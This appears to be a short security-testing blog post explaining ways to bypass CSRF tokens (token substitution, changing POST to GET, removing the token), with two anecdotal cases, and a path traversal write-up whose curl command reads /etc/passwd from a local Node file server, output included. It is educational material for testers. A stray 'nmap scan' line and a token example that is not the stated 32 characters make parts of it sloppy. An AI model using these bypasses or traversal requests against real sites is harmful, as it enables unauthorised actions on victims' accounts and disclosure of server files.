Day 20/100 Hack and Improvement

2 minute read

Bypassing CSRF Protection

Rajesh Ranjan. In most of the cases, the web applications are protected by some anti CSRF token, but there are few ways by which we can bypass these protection. Here I have describe few ways to bypass the protection.

Replacing the token value with same length

Sometimes by replacing the token with the same length may lead to bypass the CSRF protection, like if the token value is of 32 character long in the csrf_token variable, then try to replace the same with another 32 character value.

Example: if your token value csrf_token=8d959ed6e0109c03635b45921f9b17d9 then replace it with the any 32 character long like csrf_token=abcdefghijklmnop1234432123

Changing the Request Method

The another way to Bypass the CSRF protection is by changing the request method, like if any sensitive action is done via POST method, try to change it to GET method, sometime it might work.

Example:

Suppose here is a request for the password change.

POST /change_password

Body:

new_password=12345

TO

GET /change_password?new_password=12345

Remove the CSRF token completely

This technique for bypassing the CSRF protection is famous and it works in few cases. In this what we can do is, remove the csrf_token value completely and then submit the request.

Case 1: I was testing a web application and found that, while adding an address to account, there is an anti-csrf token present in the request. So I tried to remove the csfr_token value from the request and the request got submitted. So I was able to add attacker’s address into the Victim’s account

nmap scan

Case 2: This was an e-commerce website and there was an option to add items to cart. So I capture the add to cart request, and tried to remove the anti-csrf token, and the same way request got submitted.

In this case, an attacker may be able to add any items to victim cart. If victim do not find this item, he/she would pay for this item which can greatly influence company reputation

Path Traversal and Capabilities

Path traversal attacks are also known as directory traversal which leads to unrestricted access to different directories that are stored outside the web root folder. Manipulating different variables that references files such as, ../../../ sequences the attacker can achieve unrestricted access to files that are related to the application sources code or configuration in the critical files.

Write Up and Explanation

Path Traversal vulnerability allows to read content on arbitrary file on the server

The attacker saw the path traversal possible through a general file server made by nodejs. Once the attacker knew the technology that it was running, he proceeds to install the general file server in his machine by serving the different modules and executing the following curl command:

curl -v --path-as-is http://127.0.0.1:8080/../../../../../../etc/passwd

The attacker got the following result:

*   Trying 127.0.0.1...
* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
> GET /../../../../../../etc/passwd HTTP/1.1
> Host: 127.0.0.1:8080
> User-Agent: curl/7.47.0
> Accept: */*
> 
< HTTP/1.1 200 OK
< Content-Type: application/octet-stream
< Date: Wed, 31 Jan 2018 12:53:13 GMT
< Connection: keep-alive
< Transfer-Encoding: chunked
< 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
(...)

Leave a comment